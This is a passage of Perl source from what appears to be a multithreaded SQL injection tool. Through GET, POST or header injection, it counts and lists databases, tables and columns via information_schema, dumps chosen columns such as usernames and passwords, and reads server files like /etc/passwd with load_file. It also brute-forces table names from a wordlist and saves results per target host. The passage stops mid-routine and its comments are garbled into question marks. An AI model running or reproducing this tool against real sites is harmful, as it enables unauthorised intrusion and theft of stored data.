628.          print $num . "\r";
629.          sleep $pause;
630.  
631.        }
632.      }
633.     print "----------\n";
634.     print "Saved in " . "z_" . $host . ".txt\n";
635.     close(FILE);
636.     goto START;
637. }
638. if ($choice == 3) {
639.      open( FILE, ">>" . "z_" .$host . ".txt" ); # ???? ??? ?????? ???????????
640.      print "-----------------------------------------\n";
641.      print "Enter the DB-name: ";
642.      $choice = <STDIN>;
643.      chomp $choice;
644.      if ($choice =~ m/-/imgs) {$choice = "`" . $choice . "`"}
645.      print "DB-name: $choice\n";
646.      print "----------\n";
647.      $choice1 = ascii_to_hex $choice;
648.      ## ???-?? tables ? information_schema.schemata ##
649.      $url11 = $sql_start . $sql_pref1 . "count(table_name)" . $sql_pref2 . $sql_end . $plus . "from" . $plus . "information_schema.tables" . $plus . "where" . $plus . "table_schema=" . $plus . $choice1 . $limit . $filtr;
650.      if($sql_flag == 0){
651.          $current = $url11;
652.          $content = scan_url();
653.      } elsif ($sql_flag == 1) {#POST
654.          $current = $source_sql;
655.          $sql_post = $url11;
656.          $content = scan_url_POST();
657.      } elsif($sql_flag == 2){#HEADER
658.               $current = $source_sql;
659.               $sql_header_query = $url11;
660.               $sql_header_query =~ s!\Q$search!$replacement!g;
661.               $content = scan_url_HEADER();
662.      }
663.      $current = $url11;
664.      $tab_num1 = $content;
665.      $tab_num1 =~ m/ussr(.*?)ussr/img;
666.      $tab_num1 = $1;
667.      print FILE "-----------------------------------------\n";
668.      print FILE "Tables in DB [$choice]: $tab_num1\n";
669.      print FILE "-----------------------------------------\n";
670.      print "-----------------------------------------\n";
671.      print "Tables in DB [$choice]: $tab_num1\n";
672.      print "-----------------------------------------\n";
673.      $url12 = $sql_start . $sql_CP_start . $sql_pref1 . "table_name" . $sql_pref2 . $sql_CP_end . $sql_end . $plus . "from" . $plus . "information_schema.tables" . $plus . "where" . $plus . "table_schema=" . $plus . $choice1 ;
674.      $num = -1; # ?? ????????
675.      $thr = $kol_threads; # ???-?? ???????
676.      print "Request method - $method\n";
677.      print "Threads - $kol_threads\n";
678.      print "Proxy - $proxy_message\n";
679.      print "----------------------\n";
680.       for(0..$thr) {
681.          $trl[$_] = threads->create(\&gets5051);
682.      }
683.      for(0..$thr) {
684.          $trl[$_]->join;
685.      }
686.      sub gets5051 {
687.        $| = 1;
688.        while ($num<$tab_num1) {
689.          { lock($num);
690.          $num++; }
691.          if($sql_flag == 0){
692.             $current = $url12 . $plus . "limit" . $plus . $num . ",1" . $filtr;
693.             $content = scan_url();
694.          } elsif ($sql_flag == 1) {#POST
695.             $current = $source_sql;
696.             $sql_post = $url12 . $plus . "limit" . $plus . $num . ",1" . $filtr;
697.             $content = scan_url_POST();
698.          } elsif($sql_flag == 2){#HEADER
699.               $current = $source_sql;
700.               $sql_header_query = $url12 . $plus . "limit" . $plus . $num . ",1" . $filtr;
701.               $sql_header_query =~ s!\Q$search!$replacement!g;
702.               $content = scan_url_HEADER();
703.          }
704.          if ($content =~ m/ussr(.*?)ussr/img) {
705.                   print $1 . "\n";
706.                   print FILE $1 . "\n";
707.          }
708.          print $num . "\r";
709.          sleep $pause;
710.  
711.        }
712.      }
713.     print "----------\n";
714.     print "Saved in " . "z_" . $host . ".txt\n";
715.     close(FILE);
716.     goto START;
717. }
718. if ($choice == 13) {
719.      M_LOAD_FILE:
720.      open( FILE1, ">>" . "z_" .$host . ".txt" ); # ???? ??? ?????? ???????????
721.      print "-----------------------------------------\n";
722.      print "Enter file name (example: /etc/passwd) or type <exit> for main menu: ";
723.      $choice = <STDIN>;
724.      chomp $choice;
725.      if ($choice eq "exit") {close(FILE);goto START;}
726.      print "File name for read: $choice\n";
727.      $choice1 = ascii_to_hex $choice;
728.      if($sql_flag == 0){
729.          $current = $sql_start . $sql_CP_start . $sql_pref1 . "concat(0x6d7973716c2e757365723a,load_file($choice1))" . $sql_pref2 . $sql_CP_end . $sql_end . $limit . $filtr;
730.          $content = scan_url();
731.      } elsif ($sql_flag == 1) {#POST
732.          $current = $source_sql;
733.          $sql_post = $sql_start . $sql_CP_start . $sql_pref1 . "concat(0x6d7973716c2e757365723a,load_file($choice1))" . $sql_pref2 . $sql_CP_end . $sql_end . $limit . $filtr;
734.          $content = scan_url_POST();
735.      } elsif($sql_flag == 2){#HEADER
736.               $current = $source_sql;
737.               $sql_header_query = $sql_start . $sql_CP_start . $sql_pref1 . "concat(0x6d7973716c2e757365723a,load_file($choice1))" . $sql_pref2 . $sql_CP_end . $sql_end . $limit . $filtr;
738.               $sql_header_query =~ s!\Q$search!$replacement!g;
739.               $content = scan_url_HEADER();
740.      }
741.      if ($content =~ m/ussr(.*?)ussr/imgs) {
742.             print "\n\n\n" . $1 . "\n";
743.             print FILE $1 . "\n";
744.      }
745.      print "----------\n";
746.      print "Saved in " . "z_" . $host . ".txt\n";
747.      close(FILE);
748.      goto M_LOAD_FILE;
749. }
750. if ($choice == 4) {
751.      open( FILE, ">>" . "z_" .$host . ".txt" ); # ???? ??? ?????? ???????????
752.      print "-----------------------------------------\n";
753.      print "Enter the DB-name: ";
754.      $choice = <STDIN>;
755.      chomp $choice;
756.      if ($choice =~ m/-/imgs) {$choice = "`" . $choice . "`"}
757.      print "DB-name: $choice\n";
758.      print "----------\n";
759.      $choice1 = ascii_to_hex $choice;
760.      print "-----------------------------------------\n";
761.      print "Enter the TABLE-name: ";
762.      $choice2 = <STDIN>;
763.      chomp $choice2;
764.      if ($choice2 =~ m/-/imgs) {$choice2 = "`" . $choice2 . "`"}
765.      print "TABLE-name: $choice2\n";
766.      print "----------\n";
767.      $choice3 = ascii_to_hex $choice2;
768.      $url11 = $sql_start . $sql_pref1 . "count(column_name)" . $sql_pref2 . $sql_end . $plus . "from" . $plus . "information_schema.columns" . $plus . "where" . $plus . "table_name=" . $choice3 . $plus . "and" . $plus . "table_schema=" . $plus . $choice1 . $limit . $filtr;
769.     if($sql_flag == 0){
770.          $current = $url11;
771.          $content = scan_url();
772.      } elsif ($sql_flag == 1) {#POST
773.          $current = $source_sql;
774.          $sql_post = $url11;
775.          $content = scan_url_POST();
776.      } elsif($sql_flag == 2){#HEADER
777.               $current = $source_sql;
778.               $sql_header_query = $url11;
779.               $sql_header_query =~ s!\Q$search!$replacement!g;
780.               $content = scan_url_HEADER();
781.      }
782.      $col_num1 = $content;
783.      $col_num1 =~ m/ussr(.*?)ussr/img;
784.      $col_num1 = $1;
785.      print FILE "-----------------------------------------\n";
786.      print FILE "Columns in [$choice.$choice2]: $col_num1\n";
787.      print FILE "-----------------------------------------\n";
788.      print "-----------------------------------------\n";
789.      print "Columns in [$choice.$choice2]: $col_num1\n";
790.      print "-----------------------------------------\n";
791.      $url12 = $sql_start . $sql_CP_start . $sql_pref1 . "column_name" . $sql_pref2 . $sql_CP_end . $sql_end . $plus . "from" . $plus . "information_schema.columns" . $plus . "where" . $plus . "table_name=" . $choice3 . $plus . "and" . $plus . "table_schema=" . $plus . $choice1;
792.      $num = -1; # ?? ????????
793.      $thr = $kol_threads; # ???-?? ???????
794.      print "Request method - $method\n";
795.      print "Threads - $kol_threads\n";
796.      print "Proxy - $proxy_message\n";
797.      print "----------------------\n";
798.       for(0..$thr) {
799.          $trl[$_] = threads->create(\&gets5052);
800.      }
801.      for(0..$thr) {
802.          $trl[$_]->join;
803.      }
804.      sub gets5052 {
805.        $| = 1;
806.        while ($num<$col_num1) {
807.          { lock($num);
808.          $num++; }
809.          if($sql_flag == 0){
810.            $current = $url12 . $plus . "limit" . $plus . $num . ",1" . $filtr;
811.            $content = scan_url();
812.          } elsif ($sql_flag == 1) {#POST
813.            $current = $source_sql;
814.            $sql_post = $url12 . $plus . "limit" . $plus . $num . ",1" . $filtr;
815.            $content = scan_url_POST();
816.          } elsif($sql_flag == 2){#HEADER
817.               $current = $source_sql;
818.               $sql_header_query = $url12 . $plus . "limit" . $plus . $num . ",1" . $filtr;
819.               $sql_header_query =~ s!\Q$search!$replacement!g;
820.               $content = scan_url_HEADER();
821.          }
822.          if ($content =~ m/ussr(.*?)ussr/img) {
823.                   print $1 . "\n";
824.                   print FILE $1 . "\n";
825.          }
826.          print $num . "\r";
827.          sleep $pause;
828.  
829.        }
830.      }
831.     print "----------\n";
832.     print "Saved in " . "z_" . $host . ".txt\n";
833.     close(FILE);
834.     goto START;
835. }
836. #################################################################################
837. if ($choice == 5) {
838.      open( FILE, ">>" . "z_" .$host . ".txt" ); # ???? ??? ?????? ???????????
839.      ## ???-?? ?????? ? information_schema.tables ##
840.      $url11 = $sql_start . $sql_pref1 . "count(table_name)" . $sql_pref2 . $sql_end . $plus . "from" . $plus . "information_schema.tables" . $limit . $filtr; # ??????? ???-?? ??????
841.      if($sql_flag == 0){
842.          $current = $url11;
843.          $content = scan_url();
844.      } elsif ($sql_flag == 1) {#POST
845.          $current = $source_sql;
846.          $sql_post = $url11;
847.          $content = scan_url_POST();
848.      } elsif($sql_flag == 2){#HEADER
849.               $current = $source_sql;
850.               $sql_header_query = $url11;
851.               $sql_header_query =~ s!\Q$search!$replacement!g;
852.               $content = scan_url_HEADER();
853.      }  
854.      $tab_num = $content;
855.      $tab_num =~ m/ussr(.*?)ussr/imgs;
856.      $tab_num = $1; # ???-?? ???????? ? informaion_schema
857.      print "-----------------------------------------\n";
858.      print "Tables in information_schema.tables - $1\n";
859.      print "-----------------------------------------\n";
860.      ## start from2 ##
861.      print "Get ALL tables from information_schema ($1) ? (1/0): ";
862.      $choice = <STDIN>;
863.      chomp $choice;
864.      $thr = $kol_threads; # ???-?? ???????
865.      if ($choice == 1) {
866.           $num = -1; # ?? ????????
867.      } else {
868.           print "Enter START_position: ";
869.           $choice1 = <STDIN>;
870.           chomp $choice1;
871.           $num = $choice1-2;
872.           print "Enter END_position: ";
873.           $choice2 = <STDIN>;
874.           chomp $choice2;
875.           $tab_num = $choice2-1;
876.           print "Dump records from [" . ($num+2) . "] to [" . ($tab_num+1) . "]\n";
877.      }
878.      print "-----------------------------------------\n";
879.      ## end from2
880.      print FILE  "-----------------------------------------\n";
881.      print FILE  "Tables in information_schema.tables - $1\n";
882.      print FILE  "-----------------------------------------\n";
883.      $url12 = $sql_start . $sql_CP_start . $sql_pref1 . "table_name" . $sql_pref2 . $sql_CP_end . $sql_end . $plus . "from" . $plus . "information_schema.tables";
884.      print "Request method - $method\n";
885.      print "Threads - $kol_threads\n";
886.      print "Proxy - $proxy_message\n";
887.      print "----------------------\n";
888.      for(0..$thr) {
889.          $trl[$_] = threads->create(\&gets);
890.      }
891.      for(0..$thr) {
892.          $trl[$_]->join;
893.      }
894.      sub gets {
895.        $| = 1;
896.        while ($num<$tab_num) {
897.          { lock($num);
898.          $num++; }
899.          if($sql_flag == 0){
900.            $current = $url12 . $plus . "limit" . $plus . $num . ",1" . $filtr;
901.            $content = scan_url();
902.          } elsif ($sql_flag == 1) {#POST
903.            $current = $source_sql;
904.            $sql_post = $url12 . $plus . "limit" . $plus . $num . ",1" . $filtr;
905.            $content = scan_url_POST();
906.         } elsif($sql_flag == 2){#HEADER
907.               $current = $source_sql;
908.               $sql_header_query = $url12 . $plus . "limit" . $plus . $num . ",1" . $filtr;
909.               $sql_header_query =~ s!\Q$search!$replacement!g;
910.               $content = scan_url_HEADER();
911.         }  
912.          if ($content =~ m/ussr(.*?)ussr/img) {
913.                   print $1 . "\n";
914.                   print FILE $1 . "\n";
915.          }
916.          print $num . "\r";
917.          sleep $pause;
918.  
919.        }
920.      }
921.     print "----------\n";
922.     print "Saved in " . "z_" . $host . ".txt\n";
923.     close(FILE);
924.     goto START;
925. }
926. if ($choice == 6) {
927.     open( FILE, ">>" . "z_" .$host . ".txt" ); # ???? ??? ?????? ???????????
928.     print "-----------------------------------------\n";
929.     print "Enter the table_name: ";
930.     $choice = <STDIN>;
931.     chomp $choice;
932.     if ($choice =~ m/-/imgs) {$choice = "`" . $choice . "`"}
933.     print "Table: $choice\n";
934.     print "----------\n";
935.     print FILE  "-----------------------------------------\n";
936.     print FILE  "Table [ $choice ]\n";
937.     print FILE  "-----------------------------------------\n";
938.     $choice1 = ascii_to_hex $choice;
939.     $url13 = $sql_start . $sql_CP_start . $sql_pref1 . "table_schema" . $sql_pref2 . $sql_CP_end . $sql_end . $plus . "from" . $plus . "information_schema.tables" . $plus . "where" . $plus . "table_name=" . $choice1 . $limit . $filtr;
940.     if($sql_flag == 0){
941.          $current = $url13;
942.          $content = scan_url();
943.      } elsif ($sql_flag == 1) {#POST
944.          $current = $source_sql;
945.          $sql_post = $url13;
946.          $content = scan_url_POST();
947.     } elsif($sql_flag == 2){#HEADER
948.               $current = $source_sql;
949.               $sql_header_query = $url13;
950.               $sql_header_query =~ s!\Q$search!$replacement!g;
951.               $content = scan_url_HEADER();
952.     }  
953.     $prefix = $content;
954.     $prefix =~ m/ussr(.*?)ussr/img;
955.     $prefix = $1; # ??, ? ??????? ???????
956.     if ($prefix =~ m/-/imgs) {$prefix = "`" . $prefix . "`"}
957.     print "Database for $choice: $prefix\n";
958.     print FILE  "Database for $choice: $prefix\n";
959.     $url14 = $sql_start . $sql_pref1 . "count(*)" . $sql_pref2 . $sql_end . $plus . "from" . $plus . "information_schema.columns" . $plus . "where" . $plus . "table_name=" . $choice1 . $limit . $filtr;
960.     if($sql_flag == 0){
961.          $current = $url14;
962.          $content = scan_url();
963.      } elsif ($sql_flag == 1) {#POST
964.          $current = $source_sql;
965.          $sql_post = $url14;
966.          $content = scan_url_POST();
967.      } elsif($sql_flag == 2){#HEADER
968.               $current = $source_sql;
969.               $sql_header_query = $url14;
970.               $sql_header_query =~ s!\Q$search!$replacement!g;
971.               $content = scan_url_HEADER();
972.     }  
973.     $colum_number = $content;
974.     $colum_number =~ m/ussr(.*?)ussr/img;
975.     $colum_number = $1; # ???-?? ??????? ? ??????????? ?????
976.     $full_table_name = $prefix . "." . $choice;
977.     print "Number of columns in " . $full_table_name . ": $colum_number\n";
978.     print FILE  "Number of columns in " . $full_table_name . ": $colum_number\n";
979.     print "----------\n";
980.     ## ?????? ??????? ##
981.     $thr = $kol_threads; # ???-?? ???????
982.     $num = -1; # ?? ????????
983.     print "Request method - $method\n";
984.     print "Threads - $kol_threads\n";
985.     print "Proxy - $proxy_message\n";
986.     print "----------------------\n";
987.     $url15 = $sql_start . $sql_CP_start . $sql_pref1 . "column_name" . $sql_pref2 . $sql_CP_end . $sql_end . $plus . "from" . $plus . "information_schema.columns" . $plus . "where" . $plus . "table_name=" . $choice1;
988.     print FILE  "Columns in " . $full_table_name . "\n";
989.     for(0..$thr) {
990.          $trl[$_] = threads->create(\&gets2);
991.     }
992.     for(0..$thr) {
993.          $trl[$_]->join;
994.     }
995.     sub gets2 {
996.        $| = 1;
997.        while ($num<$colum_number) {
998.          { lock($num);
999.          $num++; }
1000.          if($sql_flag == 0){
1001.             $current = $url15 . $plus . "limit" . $plus . $num . ",1" . $filtr;
1002.             $content = scan_url();
1003.          } elsif ($sql_flag == 1) {#POST
1004.             $current = $source_sql;
1005.             $sql_post = $url15 . $plus . "limit" . $plus . $num . ",1" . $filtr;
1006.             $content = scan_url_POST();
1007.         } elsif($sql_flag == 2){#HEADER
1008.               $current = $source_sql;
1009.               $sql_header_query = $url15 . $plus . "limit" . $plus . $num . ",1" . $filtr;
1010.               $sql_header_query =~ s!\Q$search!$replacement!g;
1011.               $content = scan_url_HEADER();
1012.         }  
1013.          if ($content =~ m/ussr(.*?)ussr/img) {
1014.                   print "   " . $1 . "\n";
1015.                   print FILE "  "  . $1 . "\n";
1016.          }
1017.          print $num . "\r";
1018.          sleep $pause;
1019.  
1020.        }
1021.     }
1022.     print FILE "----------\n";
1023.     print "----------\n";
1024.     print "Saved in " . "z_" . $host . ".txt\n";
1025.     close(FILE);
1026.     goto START;
1027. }
1028. if ($choice == 7) {
1029.     sub ascii_to_hex ($) {
1030.              (my $str = shift) =~ s/(.|\n)/sprintf("%02lx", ord $1)/eg;
1031.              $str = "0x" . $str;
1032.              return $str;
1033.     }
1034.     open( FILE, ">>" . "z_" .$host . ".txt" ); # ???? ??? ?????? ???????????
1035.     if ($full_table_name) {
1036.        print "-----------------------------------------\n";
1037.        print "Use last parsed table: $full_table_name ? (1/0): ";
1038.        $choice = <STDIN>;
1039.        chomp $choice;
1040.        if ($choice==1) {
1041.              $table_name = $full_table_name;
1042.              print "Table: $table_name\n";
1043.              print "----------\n";
1044.        } else {
1045.              print "-----------------------------------------\n";
1046.              print "Enter the table_name: ";
1047.              $choice = <STDIN>;
1048.              chomp $choice;
1049.              if ($prefix =~ m/-/imgs) {$prefix = "`" . $prefix . "`"}
1050.              $table_name = $choice;
1051.              if ($table_name =~ m/-/imgs) {$table_name = "`" . $table_name . "`"}
1052.              print "-----------------------------------------\n";
1053.              print "MySQL>=5 or MySql<5? (1/0): ";
1054.              $choice = <STDIN>;
1055.              chomp $choice;
1056.              if ($choice == 1) {
1057.                   $choice1 = ascii_to_hex $table_name;
1058.                   $url13 = $sql_start . $sql_CP_start . $sql_pref1 . "table_schema" . $sql_pref2 . $sql_CP_end . $sql_end . $plus . "from" . $plus . "information_schema.columns" . $plus . "where" . $plus . "table_name=" . $choice1 . $limit . $filtr;
1059.                   if($sql_flag == 0){
1060.                     $current = $url13;
1061.                     $content = scan_url();
1062.                   } elsif ($sql_flag == 1) {#POST
1063.                     $current = $source_sql;
1064.                     $sql_post = $url13;
1065.                     $content = scan_url_POST();
1066.                   } elsif($sql_flag == 2){#HEADER
1067.                     $current = $source_sql;
1068.                     $sql_header_query = $url13;
1069.                     $sql_header_query =~ s!\Q$search!$replacement!g;
1070.                     $content = scan_url_HEADER();
1071.                   }  
1072.                   $prefix = $content;
1073.                   $prefix =~ m/ussr(.*?)ussr/img;
1074.                   $prefix = $1; # ??, ? ??????? ???????
1075.                   if ($prefix =~ m/-/imgs) {$prefix = "`" . $prefix . "`"}
1076.                   $table_name = "`" . $prefix . "." . $table_name . "`";
1077.              }
1078.              print "Table: $table_name\n";
1079.              print "----------\n";
1080.        }
1081.     } else {
1082.        print "-----------------------------------------\n";
1083.        print "Enter the table_name: ";
1084.        $choice = <STDIN>;
1085.        chomp $choice;
1086.        $table_name = $choice;
1087.        if ($table_name =~ m/-/imgs) {$table_name = "`" . $table_name . "`"}
1088.        print "-----------------------------------------\n";
1089.        print "MySQL>=5 or MySql<5? [if DBname.TableName - 0] (1/0): ";
1090.        $choice = <STDIN>;
1091.        chomp $choice;
1092.        if ($choice == 1) {
1093.                   $choice1 = ascii_to_hex $table_name;
1094.                   $url13 = $sql_start . $sql_CP_start . $sql_pref1 . "table_schema" . $sql_pref2 . $sql_CP_end . $sql_end . $plus . "from" . $plus . "information_schema.columns" . $plus . "where" . $plus . "table_name=" . $choice1 . $limit . $filtr;
1095.                    if($sql_flag == 0){
1096.                     $current = $url13;
1097.                     $content = scan_url();
1098.                   } elsif ($sql_flag == 1) {#POST
1099.                     $current = $source_sql;
1100.                     $sql_post = $url13;
1101.                     $content = scan_url_POST();
1102.                   } elsif($sql_flag == 2){#HEADER
1103.                     $current = $source_sql;
1104.                     $sql_header_query = $url13;
1105.                     $sql_header_query =~ s!\Q$search!$replacement!g;
1106.                     $content = scan_url_HEADER();
1107.                   }  
1108.                   $prefix = $content;
1109.                   $prefix =~ m/ussr(.*?)ussr/img;
1110.                   $prefix = $1; # ??, ? ??????? ???????
1111.                   if ($prefix =~ m/-/imgs) {$prefix = "`" . $prefix . "`"}
1112.                   $table_name = $prefix . "." . $table_name;
1113.        }
1114.        print "Table: $table_name\n";
1115.        print "----------\n";
1116.     }
1117.     print "-----------------------------------------\n";
1118.     print "Enter the column(s) name(s) - for example - id or id,username,user_password:\n";
1119.     $choice = <STDIN>;
1120.     chomp $choice;
1121.     $column_name = $choice;
1122.     print FILE  "-----------------------------------------\n";
1123.     print FILE  "Dump column(s): [ " . $column_name . " ] from [ " .$table_name . " ]\n";
1124.     print FILE  "-----------------------------------------\n";
1125.     print "Dump column(s): [ " . $column_name . " ] from [ " .$table_name . " ]\n";
1126.     print "-----------------------------------------\n";
1127.     print "Do you want add condition to sql-query?\n";
1128.     print "----------\n";
1129.     print "for example - where id=1, where username=admin (no quotes)  ? (1/0): ";
1130.     $choice = <STDIN>;
1131.     chomp $choice;
1132.     if ($choice==1) {
1133.         print "-----------------------------------------\n";
1134.         print "Enter your condition here - only one condition, without 'where', '+' and quotes, example - id=1 :\n";
1135.         print "----------\n";
1136.         $choice = <STDIN>;
1137.         chomp $choice;
1138.  
1139.         $where = $choice;
1140.         # ?????????:
1141.         ($con,$whe) = split(/=/,$where);
1142.         if($whe =~ m/[^0-9]/img) {$where = $con . "=" . ascii_to_hex $whe}
1143.         print "Your condition: [ where $where ]\n";
1144.         $condition=1;
1145.     } else {
1146.         $condition=0;
1147.     }
1148.     if ($condition==0) {
1149.          print "----------\n";
1150.          ## ?????? ???-?? ???????? ?? ??????? #
1151.          print "Count data from [ $table_name  ]\n";
1152.          $url16 = $sql_start . $sql_pref1 . "count(*)" . $sql_pref2 . $sql_end . $plus . "from" . $plus . $table_name . $limit . $filtr;
1153.          if($sql_flag == 0){
1154.               $current = $url16;
1155.               $content = scan_url();
1156.          } elsif ($sql_flag == 1) {#POST
1157.               $current = $source_sql;
1158.               $sql_post = $url16;
1159.               $content = scan_url_POST();
1160.          } elsif($sql_flag == 2){#HEADER
1161.                     $current = $source_sql;
1162.                     $sql_header_query = $url16;
1163.                     $sql_header_query =~ s!\Q$search!$replacement!g;
1164.                     $content = scan_url_HEADER();
1165.          }  
1166.          $column_name_p = $content;
1167.          $column_name_p =~ m/ussr(.*?)ussr/img;
1168.          $column_name_p = $1; # ???-?? ???????? ? ??????? ?? ????????? ???????
1169.          print "$column_name_p\n";
1170.          print "----------\n";
1171.          ## start from2 ##
1172.          print "Get ALL data from " . $table_name . " (" . $column_name_p . ") ? (1/0): ";
1173.          $choice = <STDIN>;
1174.          chomp $choice;
1175.          $thr = $kol_threads; # ???-?? ???????
1176.          if ($choice == 1) {
1177.               $num = -1; # ?? ????????
1178.          } else {
1179.               print "Enter START_position: ";
1180.               $choice1 = <STDIN>;
1181.               chomp $choice1;
1182.               $num = $choice1-2;
1183.               print "Enter END_position: ";
1184.               $choice2 = <STDIN>;
1185.               chomp $choice2;
1186.               $column_name_p = $choice2-1;
1187.               print "Dump records from [" . ($num+2) . "] to [" . ($column_name_p+1) . "]\n";
1188.          }
1189.          print "-----------------------------------------\n";
1190.          print "Request method - $method\n";
1191.          print "Threads - $kol_threads\n";
1192.          print "Proxy - $proxy_message\n";
1193.          print "----------------------\n";
1194.          ## end from2
1195.          ## ?????? ?????? ?? ??????? ##
1196.          $url17 = $sql_start . $sql_CP_start . $sql_pref1 . "concat_ws(0x3a," . $column_name . ")" . $sql_pref2 . $sql_CP_end . $sql_end . $plus ."from" . $plus . $table_name;
1197.          for(0..$thr) {
1198.              $trl[$_] = threads->create(\&gets4);
1199.          }
1200.          for(0..$thr) {
1201.              $trl[$_]->join;
1202.          }
1203.          sub gets4 {
1204.             $| = 1;
1205.             while ($num<$column_name_p) {
1206.                { lock($num);
1207.                $num++; }
1208.                if($sql_flag == 0){
1209.                   $current = $url17 . $plus . "limit" . $plus . $num . ",1" . $filtr;
1210.                   $content = scan_url();
1211.                } elsif ($sql_flag == 1) {#POST
1212.                   $current = $source_sql;
1213.                   $sql_post = $url17 . $plus . "limit" . $plus . $num . ",1" . $filtr;
1214.                   $content = scan_url_POST();
1215.                } elsif($sql_flag == 2){#HEADER
1216.                     $current = $source_sql;
1217.                     $sql_header_query = $url17 . $plus . "limit" . $plus . $num . ",1" . $filtr;
1218.                     $sql_header_query =~ s!\Q$search!$replacement!g;
1219.                     $content = scan_url_HEADER();
1220.                }  
1221.                if ($content =~ m/ussr(.*?)ussr/img) {
1222.                     print "   " . $1 . "\n";
1223.                     print FILE "  "  . $1 . "\n";
1224.                }
1225.                print $num . "\r";
1226.                sleep $pause;
1227.  
1228.             }
1229.          }
1230.     print "----------\n";
1231.     print "Saved in " . "z_" . $host . ".txt\n";
1232.     close(FILE);
1233.     goto START;
1234.     } else {
1235.     ## ?????? ?????? ?? ??????? ##
1236.          print "Count data from [ $table_name  ] with [ where " . $where . " ] \n";
1237.          $url16 = $sql_start . $sql_pref1 . "count(*)" . $sql_pref2 . $sql_end . $plus . "from" . $plus . $table_name . $plus . "where" . $plus . $where . $limit . $filtr;
1238.          if($sql_flag == 0){
1239.                $current = $url16;
1240.                $content = scan_url();
1241.          } elsif ($sql_flag == 1) {#POST
1242.                $current = $source_sql;
1243.                $sql_post = $url16;
1244.                $content = scan_url_POST();
1245.          } elsif($sql_flag == 2){#HEADER
1246.                     $current = $source_sql;
1247.                     $sql_header_query = $url16;
1248.                     $sql_header_query =~ s!\Q$search!$replacement!g;
1249.                     $content = scan_url_HEADER();
1250.          }  
1251.          $column_name_p = $content;
1252.          $column_name_p =~ m/ussr(.*?)ussr/img;
1253.          $column_name_p = $1; # ???-?? ???????? ? ??????? ?? ????????? ???????
1254.          print "$column_name_p\n";
1255.          print "----------\n";
1256.          ## start from2 ##
1257.          print "Get ALL data from " . $table_name . " with [ where " . $where . " ] (" . $column_name_p . ") ? (1/0): ";
1258.          $choice = <STDIN>;
1259.          chomp $choice;
1260.          $thr = $kol_threads; # ???-?? ???????
1261.          if ($choice == 1) {
1262.               $num = -1; # ?? ????????
1263.          } else {
1264.               print "Enter START_position: ";
1265.               $choice1 = <STDIN>;
1266.               chomp $choice1;
1267.               $num = $choice1-2;
1268.               print "Enter END_position: ";
1269.               $choice2 = <STDIN>;
1270.               chomp $choice2;
1271.               $column_name_p = $choice2-1;
1272.               print "Dump records from [" . ($num+2) . "] to [" . ($column_name_p+1) . "]\n";
1273.          }
1274.          print "-----------------------------------------\n";
1275.          print "Request method - $method\n";
1276.          print "Threads - $kol_threads\n";
1277.          print "Proxy - $proxy_message\n";
1278.          print "----------------------\n";
1279.          ## end from2
1280.          $url18 = $sql_start . $sql_CP_start . $sql_pref1 . "concat_ws(0x3a," . $column_name . ")" . $sql_pref2 . $sql_CP_end . $sql_end . $plus . "from" . $plus . $table_name . $plus . "where" . $plus . $where;
1281.          for(0..$thr) {
1282.              $trl[$_] = threads->create(\&gets5);
1283.          }
1284.          for(0..$thr) {
1285.              $trl[$_]->join;
1286.          }
1287.          sub gets5 {
1288.             $| = 1;
1289.             while ($num<$column_name_p) {
1290.                { lock($num);
1291.                $num++; }
1292.                if($sql_flag == 0){
1293.                   $current = $url18 . $plus . "limit" . $plus . $num . ",1" . $filtr;
1294.                   $content = scan_url();
1295.                }elsif ($sql_flag == 1) {#POST
1296.                   $current = $source_sql;
1297.                   $sql_post = $url18 . $plus . "limit" . $plus . $num . ",1" . $filtr;
1298.                   $content = scan_url_POST();
1299.                } elsif($sql_flag == 2){#HEADER
1300.                     $current = $source_sql;
1301.                     $sql_header_query = $url18 . $plus . "limit" . $plus . $num . ",1" . $filtr;
1302.                     $sql_header_query =~ s!\Q$search!$replacement!g;
1303.                     $content = scan_url_HEADER();
1304.                }  
1305.                if ($content =~ m/ussr(.*?)ussr/img) {
1306.                     print "   " . $1 . "\n";
1307.                     print FILE "  "  . $1 . "\n";
1308.                }
1309.                print $num . "\r";
1310.                sleep $pause;
1311.  
1312.             }
1313.          }
1314.          print "----------\n";
1315.          print "Saved in " . "z_" . $host . ".txt\n";
1316.          close(FILE);
1317.          goto START;
1318.     }
1319. }
1320. if ($choice == 8) {
1321.    START1:
1322.  
1323.    print "    [1] Brute table\n";
1324.    print "    [2] Brute column\n";
1325.    print "    [3] Main menu\n";
1326.    print "----------\n";
1327.    $choice = <STDIN>;
1328.    chomp $choice;
1329.    print "Your choice: $choice\n";
1330.    $url19 = $sql_start . $sql_CP_start . $sql_pref1 .  "concat(0x7665723a,version())" . $sql_pref2 . $sql_CP_end . $sql_end . $limit . $filtr;
1331.    print "Check version(): ";
1332.    $current = $url19;
1333.    $content = scan_url();
1334.    $ver = $content;
1335.    $ver =~ m/ussr(.*?)ussr/img;
1336.    $ver = $1;
1337.    if ($ver) {
1338.          print " $ver \n";
1339.    } else {
1340.          print " Can't get data \n";
1341.          goto START1;
1342.    }
1343.    print "-------------\n";
1344.    if ($choice == 1) {
1345.        open( FILE1, ">>" . "z_" .$host . ".txt" ); # ???? ??? ?????? ???????????
1346.        print "   Brute tables\n";
1347.        print "   -------------\n";
1348.        print FILE1 "   Brute tables\n";
1349.        print FILE1 "   -------------\n";
1350.        open(FILE, "<", $source_table_list);
1351.        while(<FILE>) {
1352.          chomp;
1353.          push(@tables4, $_);
1354.        }
1355.        close(FILE);
1356.        print "Add prefix for brute tables ? ( for example - PHPBB_ ) (1/0): ";
1357.        $choice = <STDIN>;
1358.        chomp $choice;
1359.        if ($choice == 1) {
1360.               print "Enter your prefix for brute tables: ";
1361.               $choice = <STDIN>;
1362.               chomp $choice;
1363.               $pref_brute = $choice;
1364.        } else {
1365.               $pref_brute = "";
1366.        }
1367.        $size = 0;
1368.        $size = @tables4;
1369.        print "File: $source_table_list\n";
1370.        print "Tables: $size\n";
1371.        print "-------------\n";
1372.        print "Request method - $method\n";
1373.        print "Threads - $kol_threads\n";
1374.        print "Proxy - $proxy_message\n";
1375.        print "----------------------\n";
1376.        $thr = $kol_threads; # ???-?? ???????
1377.        $num = -1; # ?? ????????
1378.        for(0..$thr) {
1379.             $trl[$_] = threads->create(\&gets6);
1380.        }
1381.        for(0..$thr) {
1382.             $trl[$_]->join;
1383.        }
1384.        sub gets6 {
1385.             $| = 1;
1386.             while ($num<$size) {
1387.                { lock($num);
1388.                $num++; }
1389.                $current1 = $pref_brute . $tables4[$num];
